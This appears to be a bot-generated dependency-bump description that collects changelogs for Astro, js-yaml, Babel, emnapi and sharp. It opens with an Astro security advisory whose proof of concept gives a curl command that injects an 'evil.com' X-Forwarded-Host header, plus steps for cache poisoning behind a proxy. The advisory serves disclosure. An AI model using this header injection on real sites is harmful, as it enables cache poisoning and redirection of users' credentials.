Astro reflects the value in X-Forwarded-Host in output when using Astro.url without any validation.

It is common for web servers such as nginx to route requests via the Host header, and forward on other request headers. As such as malicious request can be sent with both a Host header and an X-Forwarded-Host header where the values do not match and the X-Forwarded-Host header is malicious. Astro will then return the malicious value.

This could result in any usages of the Astro.url value in code being manipulated by a request. For example if a user follows guidance and uses Astro.url for a canonical link the canonical link can be manipulated to another site. It is not impossible to imagine that the value could also be used as a login/registration or other form URL as well, resulting in potential redirecting of login credentials to a malicious party.

As this is a per-request attack vector the surface area would only be to the malicious user until one considers that having a caching proxy is a common setup, in which case any page which is cached could persist the malicious value for subsequent users.

Many other frameworks have an allowlist of domains to validate against, or do not have a case where the headers are reflected to avoid such issues.

PoC

• Check out the minimal Astro example found here: https://github.com/Chisnet/minimal_dynamic_astro_server
• nvm use
• yarn run build
• node ./dist/server/entry.mjs
• curl --location 'http://localhost:4321/' --header 'X-Forwarded-Host: www.evil.com' --header 'Host: www.example.com'
• Observe that the response reflects the malicious X-Forwarded-Host header

For the more advanced / dangerous attack vector deploy the application behind a caching proxy, e.g. Cloudflare, set a non-zero cache time, perform the above curl request a few times to establish a cache, then perform the request without the malicious headers and observe that the malicious data is persisted.

Impact

This could affect anyone using Astro in an on-demand/dynamic rendering mode behind a caching proxy.

Too many releases to show here. View the full release notes.

🚨 js-yaml has prototype pollution in merge (<<)

Impact

In js-yaml 4.1.0, 4.0.0, and 3.14.1 and below, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (__proto__). All users who parse untrusted yaml documents may be impacted.

Patches

Problem is patched in js-yaml 4.1.1 and 3.14.2.

Workarounds

You can protect against this kind of attack on the server by using node --disable-proto=delete or deno (in Deno, pollution protection is on by default).

References

https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html

4.1.1 (from changelog)

Security

• Fix prototype pollution issue in yaml merge (<<) operator.

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 7 commits:

• 4.1.1 released
• dist rebuild
• lint fix
• fix prototype pollution in merge (<<)
• README.md: HTTP => HTTPS (#678)
• doc: 'empty' style option for !!null
• Fix demo link (#618)

2.13.1 (from changelog)

Patch Changes

• 357b8fe: Fixes a panic when parsing files with a closing frontmatter fence (---) but no opening fence. The compiler now returns a helpful diagnostic error instead of crashing.
• cba568f: Fixes the "Unterminated string literal" error when using multiline attribute values on components.

2.13.0 (from changelog)

Minor Changes

• 59f7759: Support HTML element

  Based on the recent commit history, this change appears to be related to fixing issue #1093 regarding selectedcontent parsing in customizable selects. The element is part of the new Customizable Select Element API in HTML, used within elements to display the currently selected option(s).

• 89c80fe: Adds a walkAsync utility function that returns a Promise from the tree traversal process.

  Unlike the existing walk function which doesn't provide a way to wait for traversal completion, walkAsync allows consumers to await the full traversal of the AST.

Patch Changes

• 2a27aca: Fixes a potential parsing issue with head content defined in a component where another component is rendered first.
• 1264286: Fixes a CSS scoping issue when a selector contains only pseudo selectors.

Does any of this look wrong? Please let us know.

7.28.5

v7.28.5 (2025-10-23)

Thank you @CO0Ki3, @Olexandr88, and @youthfulhps for your first PRs!

👓 Spec Compliance

• babel-parser
  • #17446 Allow Runtime Errors for Function Call Assignment Targets (@liuxingbaoyu)
• babel-helper-validator-identifier
  • #17501 fix: update identifier to unicode 17 (@fisker)

🐛 Bug Fix

• babel-plugin-proposal-destructuring-private
  • #17534 Allow mixing private destructuring and rest (@CO0Ki3)
• babel-parser
  • #17521 Improve @babel/parser error typing (@JLHwung)
  • #17491 fix: improve ts-only declaration parsing (@JLHwung)
• babel-plugin-proposal-discard-binding, babel-plugin-transform-destructuring
  • #17519 fix: rest correctly returns plain array (@liuxingbaoyu)
• babel-helper-create-class-features-plugin, babel-helper-member-expression-to-functions, babel-plugin-transform-block-scoping, babel-plugin-transform-optional-chaining, babel-traverse, babel-types
  • #17503 Fix JSXIdentifier handling in isReferencedIdentifier (@JLHwung)
• babel-traverse
  • #17504 fix: ensure scope.push register in anonymous fn (@JLHwung)

🏠 Internal

• babel-types
  • #17494 Type checking babel-types scripts (@JLHwung)

🏃‍♀️ Performance

• babel-core
  • #17490 Faster finding of locations in buildCodeFrameError (@liuxingbaoyu)

Committers: 8

• Babel Bot (@babel-bot)
• Byeongho Yoo (@youthfulhps)
• Huáng Jùnliàng (@JLHwung)
• Hyeon Dokko (@CO0Ki3)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @Olexandr88
• @liuxingbaoyu
• fisker Cheung (@fisker)

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

7.29.0

v7.29.0 (2026-01-31)

Thanks @simbahax for your first PR!

🚀 New Feature

• babel-types
  • #17750 [7.x backport] Add attributes import declaration builder (@JLHwung)
• babel-standalone
  • #17663 [7.x backport] feat(standalone): export async transform (@JLHwung)
  • #17725 [7.x backport] feat: read standalone targets from data-targets (@JLHwung)

🐛 Bug Fix

• babel-parser
  • #17765 fix(parser): correctly parse type assertions in extends clause (@nicolo-ribaudo)
  • #17723 [7.x backport] fix(parser): improve super type argument parsing (@JLHwung)
• babel-traverse
  • #17708 fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (@simbahax)
• babel-plugin-transform-block-scoping, babel-traverse
  • #17737 [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (@magic-akari)

🏃‍♀️ Performance

• babel-generator, babel-runtime-corejs3
  • #17642 [Babel 7] Improve generator performance (@liuxingbaoyu)

Committers: 6

• David (@simbahax)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu
• @magic-akari

7.28.5

v7.28.5 (2025-10-23)

Thank you @CO0Ki3, @Olexandr88, and @youthfulhps for your first PRs!

👓 Spec Compliance

• babel-parser
  • #17446 Allow Runtime Errors for Function Call Assignment Targets (@liuxingbaoyu)
• babel-helper-validator-identifier
  • #17501 fix: update identifier to unicode 17 (@fisker)

🐛 Bug Fix

• babel-plugin-proposal-destructuring-private
  • #17534 Allow mixing private destructuring and rest (@CO0Ki3)
• babel-parser
  • #17521 Improve @babel/parser error typing (@JLHwung)
  • #17491 fix: improve ts-only declaration parsing (@JLHwung)
• babel-plugin-proposal-discard-binding, babel-plugin-transform-destructuring
  • #17519 fix: rest correctly returns plain array (@liuxingbaoyu)
• babel-helper-create-class-features-plugin, babel-helper-member-expression-to-functions, babel-plugin-transform-block-scoping, babel-plugin-transform-optional-chaining, babel-traverse, babel-types
  • #17503 Fix JSXIdentifier handling in isReferencedIdentifier (@JLHwung)
• babel-traverse
  • #17504 fix: ensure scope.push register in anonymous fn (@JLHwung)

🏠 Internal

• babel-types
  • #17494 Type checking babel-types scripts (@JLHwung)

🏃‍♀️ Performance

• babel-core
  • #17490 Faster finding of locations in buildCodeFrameError (@liuxingbaoyu)

Committers: 8

• Babel Bot (@babel-bot)
• Byeongho Yoo (@youthfulhps)
• Huáng Jùnliàng (@JLHwung)
• Hyeon Dokko (@CO0Ki3)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @Olexandr88
• @liuxingbaoyu
• fisker Cheung (@fisker)

7.28.4

v7.28.4 (2025-09-05)

Thanks @gwillen and @mrginglymus for your first PRs!

🏠 Internal

• babel-core, babel-helper-check-duplicate-nodes, babel-traverse, babel-types
  • #17493 Update Jest to v30.1.1 (@JLHwung)
• babel-plugin-transform-regenerator
  • #17455 chore: Clean up transform-regenerator (@liuxingbaoyu)
• babel-core
  • #17474 Switch to @jridgewell/remapping (@mrginglymus)

Committers: 5

• Babel Bot (@babel-bot)
• Bill Collins (@mrginglymus)
• Glenn Willen (@gwillen)
• Huáng Jùnliàng (@JLHwung)
• @liuxingbaoyu

7.28.3

v7.28.3 (2025-08-14)

👓 Spec Compliance

• babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators, babel-plugin-transform-class-static-block, babel-preset-env
  • #17443 [static blocks] Do not inject new static fields after static code (@nicolo-ribaudo)

🐛 Bug Fix

• babel-parser
  • #17465 fix(parser/typescript): parse import("./a", {with:{},}) (@easrng)
  • #17478 fix(parser): stop subscript parsing on async arrow (@JLHwung)

💅 Polish

• babel-plugin-transform-regenerator, babel-plugin-transform-runtime
  • #17363 Do not save last yield in call in temp var (@nicolo-ribaudo)

📝 Documentation

• #17448 move eslint-{parser,plugin} docs to the website (@JLHwung)

🏠 Internal

• #17454 Enable type checking for scripts and babel-worker.cjs (@JLHwung)

🔬 Output optimization

• babel-plugin-proposal-destructuring-private, babel-plugin-proposal-do-expressions
  • #17444 Optimize do expression output (@JLHwung)

Committers: 5

• Babel Bot (@babel-bot)
• Huáng Jùnliàng (@JLHwung)
• Jam Balaya (@JamBalaya56562)
• Nicolò Ribaudo (@nicolo-ribaudo)
• easrng (@easrng)

7.28.0

v7.28.0 (2025-07-02)

🚀 New Feature

• babel-node
  • #17147 Support top level await in node repl (@liuxingbaoyu)
• babel-types
  • #17258 feat(matchesPattern): support super/private/meta (@JLHwung)
• babel-compat-data, babel-preset-env
  • #17355 Add explicit resource management to preset-env (@JLHwung)
• babel-core, babel-parser
  • #17390 Support sourceType: "commonjs" (@JLHwung)
• babel-generator, babel-parser
  • #17346 Materialize explicitResourceManagement parser plugin (@JLHwung)
• babel-plugin-proposal-destructuring-private, babel-plugin-proposal-do-expressions, babel-plugin-transform-object-rest-spread, babel-traverse, babel-types
  • #17391 LVal coverage updates (Part 2) (@JLHwung)
• babel-parser, babel-traverse, babel-types
  • #17378 Accept bigints in t.bigIntLiteral factory (@JLHwung)
• babel-generator, babel-plugin-proposal-destructuring-private, babel-plugin-proposal-discard-binding, babel-plugin-transform-destructuring, babel-plugin-transform-explicit-resource-management, babel-plugin-transform-react-display-name, babel-types
  • #17277 Transform discard binding (@JLHwung)
• babel-generator, babel-parser, babel-plugin-proposal-destructuring-private, babel-plugin-transform-block-scoping, babel-plugin-transform-object-rest-spread, babel-plugin-transform-typescript, babel-traverse, babel-types
  • #17163 Parse discard binding (@JLHwung)

🐛 Bug Fix

• babel-helper-globals, babel-plugin-transform-classes, babel-traverse
  • #17297 Create babel-helper-globals (@JLHwung)
• babel-types
  • #17009 feature: TSTypeOperator: keyof (#16799) (@coderaiser)

🏠 Internal

• babel-compat-data, babel-plugin-proposal-decorators, babel-plugin-transform-async-generator-functions, babel-plugin-transform-json-modules, babel-plugin-transform-regenerator, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs3
  • #17403 Update babel-polyfill packages (@nicolo-ribaudo)

Committers: 5

• Babel Bot (@babel-bot)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu
• coderaiser (@coderaiser)

7.27.7

v7.27.7 (2025-06-26)

Thanks @arthur-mountain and @evankanderson for your first PRs!

👓 Spec Compliance

• babel-parser, babel-plugin-transform-classes
  • #17203 Interepret parser allow* options as top level only (@JLHwung)
• babel-parser
  • #17371 fix: disable using in ambient context (@JLHwung)

🐛 Bug Fix

• babel-core
  • #17392 Improve TS babel config loading (@JLHwung)
• babel-types
  • #17376 fix: support negative bigint in valueToNode (@JLHwung)
• babel-plugin-transform-parameters
  • #17352 fix: Params of async function* should throw synchronously (@liuxingbaoyu)

🏠 Internal

• babel-plugin-transform-destructuring, babel-plugin-transform-object-rest-spread
  • #17389 Use NodePath#splitExportDeclaration in destructuring transforms (@JLHwung)

Committers: 6

• Arthur (@arthur-mountain)
• Babel Bot (@babel-bot)
• Evan Anderson (@evankanderson)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

7.29.0

v7.29.0 (2026-01-31)

Thanks @simbahax for your first PR!

🚀 New Feature

• babel-types
  • #17750 [7.x backport] Add attributes import declaration builder (@JLHwung)
• babel-standalone
  • #17663 [7.x backport] feat(standalone): export async transform (@JLHwung)
  • #17725 [7.x backport] feat: read standalone targets from data-targets (@JLHwung)

🐛 Bug Fix

• babel-parser
  • #17765 fix(parser): correctly parse type assertions in extends clause (@nicolo-ribaudo)
  • #17723 [7.x backport] fix(parser): improve super type argument parsing (@JLHwung)
• babel-traverse
  • #17708 fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (@simbahax)
• babel-plugin-transform-block-scoping, babel-traverse
  • #17737 [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (@magic-akari)

🏃‍♀️ Performance

• babel-generator, babel-runtime-corejs3
  • #17642 [Babel 7] Improve generator performance (@liuxingbaoyu)

Committers: 6

• David (@simbahax)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu
• @magic-akari

7.28.5

v7.28.5 (2025-10-23)

Thank you @CO0Ki3, @Olexandr88, and @youthfulhps for your first PRs!

👓 Spec Compliance

• babel-parser
  • #17446 Allow Runtime Errors for Function Call Assignment Targets (@liuxingbaoyu)
• babel-helper-validator-identifier
  • #17501 fix: update identifier to unicode 17 (@fisker)

🐛 Bug Fix

• babel-plugin-proposal-destructuring-private
  • #17534 Allow mixing private destructuring and rest (@CO0Ki3)
• babel-parser
  • #17521 Improve @babel/parser error typing (@JLHwung)
  • #17491 fix: improve ts-only declaration parsing (@JLHwung)
• babel-plugin-proposal-discard-binding, babel-plugin-transform-destructuring
  • #17519 fix: rest correctly returns plain array (@liuxingbaoyu)
• babel-helper-create-class-features-plugin, babel-helper-member-expression-to-functions, babel-plugin-transform-block-scoping, babel-plugin-transform-optional-chaining, babel-traverse, babel-types
  • #17503 Fix JSXIdentifier handling in isReferencedIdentifier (@JLHwung)
• babel-traverse
  • #17504 fix: ensure scope.push register in anonymous fn (@JLHwung)

🏠 Internal

• babel-types
  • #17494 Type checking babel-types scripts (@JLHwung)

🏃‍♀️ Performance

• babel-core
  • #17490 Faster finding of locations in buildCodeFrameError (@liuxingbaoyu)

Committers: 8

• Babel Bot (@babel-bot)
• Byeongho Yoo (@youthfulhps)
• Huáng Jùnliàng (@JLHwung)
• Hyeon Dokko (@CO0Ki3)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @Olexandr88
• @liuxingbaoyu
• fisker Cheung (@fisker)

7.28.4

v7.28.4 (2025-09-05)

Thanks @gwillen and @mrginglymus for your first PRs!

🏠 Internal

• babel-core, babel-helper-check-duplicate-nodes, babel-traverse, babel-types
  • #17493 Update Jest to v30.1.1 (@JLHwung)
• babel-plugin-transform-regenerator
  • #17455 chore: Clean up transform-regenerator (@liuxingbaoyu)
• babel-core
  • #17474 Switch to @jridgewell/remapping (@mrginglymus)

Committers: 5

• Babel Bot (@babel-bot)
• Bill Collins (@mrginglymus)
• Glenn Willen (@gwillen)
• Huáng Jùnliàng (@JLHwung)
• @liuxingbaoyu

7.28.2

v7.28.2 (2025-07-24)

Thanks @souhailaS for your first PR!

🐛 Bug Fix

• babel-types
  • #17445 [babel 7] Make operator param in t.tsTypeOperator optional (@nicolo-ribaudo)
• babel-helpers, babel-plugin-transform-async-generator-functions, babel-plugin-transform-regenerator, babel-preset-env, babel-runtime-corejs3
  • #17441 fix: regeneratorDefine compatibility with es5 strict mode (@liuxingbaoyu)

Committers: 4

• Babel Bot (@babel-bot)
• Nicolò Ribaudo (@nicolo-ribaudo)
• SOUHAILA SERBOUT (@souhailaS)
• @liuxingbaoyu

7.28.1

v7.28.1 (2025-07-12)

🐛 Bug Fix

• babel-plugin-transform-async-generator-functions, babel-plugin-transform-regenerator
  • #17426 fix: regenerator correctly handles throw outside of try (@liuxingbaoyu)

📝 Documentation

• babel-types
  • #17422 Add missing FunctionParameter docs (@JLHwung)

↩️ Revert

• babel-plugin-proposal-destructuring-private, babel-plugin-proposal-do-expressions, babel-types
  • #17432 Do not mark OptionalMemberExpresion as LVal (@JLHwung)

Committers: 3

• Babel Bot (@babel-bot)
• Huáng Jùnliàng (@JLHwung)
• @liuxingbaoyu

7.28.0

v7.28.0 (2025-07-02)

🚀 New Feature

• babel-node
  • #17147 Support top level await in node repl (@liuxingbaoyu)
• babel-types
  • #17258 feat(matchesPattern): support super/private/meta (@JLHwung)
• babel-compat-data, babel-preset-env
  • #17355 Add explicit resource management to preset-env (@JLHwung)
• babel-core, babel-parser
  • #17390 Support sourceType: "commonjs" (@JLHwung)
• babel-generator, babel-parser
  • #17346 Materialize explicitResourceManagement parser plugin (@JLHwung)
• babel-plugin-proposal-destructuring-private, babel-plugin-proposal-do-expressions, babel-plugin-transform-object-rest-spread, babel-traverse, babel-types
  • #17391 LVal coverage updates (Part 2) (@JLHwung)
• babel-parser, babel-traverse, babel-types
  • #17378 Accept bigints in t.bigIntLiteral factory (@JLHwung)
• babel-generator, babel-plugin-proposal-destructuring-private, babel-plugin-proposal-discard-binding, babel-plugin-transform-destructuring, babel-plugin-transform-explicit-resource-management, babel-plugin-transform-react-display-name, babel-types
  • #17277 Transform discard binding (@JLHwung)
• babel-generator, babel-parser, babel-plugin-proposal-destructuring-private, babel-plugin-transform-block-scoping, babel-plugin-transform-object-rest-spread, babel-plugin-transform-typescript, babel-traverse, babel-types
  • #17163 Parse discard binding (@JLHwung)

🐛 Bug Fix

• babel-helper-globals, babel-plugin-transform-classes, babel-traverse
  • #17297 Create babel-helper-globals (@JLHwung)
• babel-types
  • #17009 feature: TSTypeOperator: keyof (#16799) (@coderaiser)

🏠 Internal

• babel-compat-data, babel-plugin-proposal-decorators, babel-plugin-transform-async-generator-functions, babel-plugin-transform-json-modules, babel-plugin-transform-regenerator, babel-plugin-transform-runtime, babel-preset-env, babel-runtime-corejs3
  • #17403 Update babel-polyfill packages (@nicolo-ribaudo)

Committers: 5

• Babel Bot (@babel-bot)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu
• coderaiser (@coderaiser)

7.27.7

v7.27.7 (2025-06-26)

Thanks @arthur-mountain and @evankanderson for your first PRs!

👓 Spec Compliance

• babel-parser, babel-plugin-transform-classes
  • #17203 Interepret parser allow* options as top level only (@JLHwung)
• babel-parser
  • #17371 fix: disable using in ambient context (@JLHwung)

🐛 Bug Fix

• babel-core
  • #17392 Improve TS babel config loading (@JLHwung)
• babel-types
  • #17376 fix: support negative bigint in valueToNode (@JLHwung)
• babel-plugin-transform-parameters
  • #17352 fix: Params of async function* should throw synchronously (@liuxingbaoyu)

🏠 Internal

• babel-plugin-transform-destructuring, babel-plugin-transform-object-rest-spread
  • #17389 Use NodePath#splitExportDeclaration in destructuring transforms (@JLHwung)

Committers: 6

• Arthur (@arthur-mountain)
• Babel Bot (@babel-bot)
• Evan Anderson (@evankanderson)
• Huáng Jùnliàng (@JLHwung)
• Nicolò Ribaudo (@nicolo-ribaudo)
• @liuxingbaoyu

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

1.10.0

What's Changed

• fix: early update wasm memory for views (https://github.com/hardfist/emnapi-shared-memory-grow-repro)
• fix!: napi_adjust_external_memory no longer grow wasm memory
• fix: add missing from64 wrap
• fix: coalesce tsfn (js version) send message
• ci: restructure CI workflows
• ci: prebuilt liraries using llvm 22

Thanks @hardfist

Full Changelog: v1.9.2...v1.10.0

1.9.2

What's Changed

• fix: allow maximum memory 4GB by @toyobayashi in #205

Full Changelog: v1.9.1...v1.9.2

1.9.1

fix for emscripten 5.0.3
emscripten-core/emscripten@3051725

Full Changelog: v1.9.0...v1.9.1

1.9.0

What's Changed

• fix data race and use-after-free in napi_threadsafe_function by @toyobayashi in #199
  • fix tsfn not work in JS based async_work workers
  • fix pthread_create not work in JS based async_work workers
  • emnapi_basic[-mt].a includes libuv symbols now
• refactor: dispatch async work queue in shared memory by @toyobayashi in #200
  • Avoids deadlock when main thread block on waiting queued async work starting. Completed work can not be dispatched to main thread that cause no new worker available, then queued work never start.
  • wasm32-wasip1-threads target spawn async worker in JS will use pthread_create, no longer maintain a separate worker pool.
• rename node_api_create_object_with_properties by @toyobayashi in #193
• fix: execute tsfn finalizer after queue drains when aborted
• feat: add required config hint in package entry

  const { requiredConfig } = require('emnapi')
  console.log(requiredConfig.clang.wasmld)

  [
    '--import-memory',
    '--shared-memory',
    '--export-table',
    '--export=malloc',
    '--export=free',
    '--export=napi_register_wasm_v1',
    '--export-if-defined=node_api_module_get_api_version_v1',
    '--export=emnapi_thread_crashed',
    '--export-if-defined=emnapi_async_worker_create',
    '--export-if-defined=emnapi_async_worker_init'
  ]
  

Full Changelog: v1.8.1...v1.9.0

1.8.1

What's Changed

• feat: add support for Float16Array by @toyobayashi in #190

Full Changelog: v1.8.0...v1.8.1

1.8.0

What's Changed

• feat: add node_api_set_prototype by @toyobayashi in #188

Full Changelog: v1.7.1...v1.8.0

1.7.1

What's Changed

• move Node-API version detection by @toyobayashi in #182
• feat: support SharedArrayBuffer in napi_create_dataview by @toyobayashi in #183

Full Changelog: v1.7.0...v1.7.1

1.7.0

What's Changed

• feat: add napi_create_object_with_properties method by @toyobayashi in #181

Full Changelog: v1.6.0...v1.7.0

1.6.0

What's Changed

• feat: added SharedArrayBuffer api by @toyobayashi in #171
• feat: make napi_delete_reference use node_api_basic_env by @toyobayashi in #170
• ci: migrate to npm trusted publishing by @toyobayashi in #168

Full Changelog: v1.5.0...v1.6.0

1.5.0

What's Changed

Prebuilt libraries are built by LLVM clang 20.

• fix: env undefined after emitting beforeExit event by @toyobayashi in #162
• fix(wasi): avoid deadlock caused by child thread abort when the main thread is in Atomics.wait and allow blocking calls on browser main thread (requires wasi-sdk 26+ and --export=emnapi_thread_crashed) by @toyobayashi in #163
• build: backport emscripten parse tools changes to v1 by @toyobayashi in #165

Full Changelog: v1.4.5...v1.5.0

1.4.5

What's Changed

• fix(wasm32-wasip1-threads): process never exit if trap in threads (#156)

Full Changelog: v1.4.4...v1.4.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 47 commits:

• 1.10.0
• fix: free queue node and set async_pending flag before finalize
• fix: tsfn use after free
• ci: llvm 22
• fix: coalesce tsfn send message (#210)
• test: fix async_progress_worker test (#209)
• ci: restructure CI workflows (#208)
• fix: add missing `from64` wrap
• fix!: `napi_adjust_external_memory` no longer grow wasm memory (#207)
• fix: early update wasm memory for views (#206)
• ci: manual release
• 1.9.2
• [Backport] fix: allow maximum memory 4GB (#205)
• 1.9.1
• fix for emscripten 5.0.3
• 1.9.0
• feat: add required config hint in package entry
• fix: execute tsfn finalizer after queue drains when aborted (nodejs/node#61956)
• refactor: dispatch async work queue in shared memory (#200)
• [Backport] fix data race and use-after-free in napi_threadsafe_function (#199)
• feat!: fix `node_api_create_object_with_properties` name (#193)
• refactor: use Node-API in comments (#194)
• 1.8.1
• [Backport] feat: add support for Float16Array (#191)
• 1.8.0
• [Backport] feat: add node_api_set_prototype (#189)
• 1.7.1
• feat: support SharedArrayBuffer in napi_create_dataview (#183)
• move Node-API version detection (#182)
• 1.7.0
• [Backport] feat: add napi_create_object_with_properties method (#181)
• ci: fix version retrieval
• 1.6.0
• feat: make napi_delete_reference use node_api_basic_env (#170)
• [Backport] feat: added SharedArrayBuffer api (#171)
• ci: migrate to npm trusted publishing (#168)
• fix ci
• fix ci
• 1.5.0
• [Backport] build: backport emscripten parse tools changes to v1 (#165)
• fix: signature mismatch
• [Backport] fix(wasi): avoid deadlock caused by child thread abort when the main thread is in `Atomics.wait` (#163)
• [Backport] fix: env undefined after emitting beforeExit event (#162)
• 1.4.5
• fix(wasm32-wasip1-threads): process never exit if trap in threads (#156)
• 1.4.4
• fix: `worker.onerror` may receive an `Event`

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
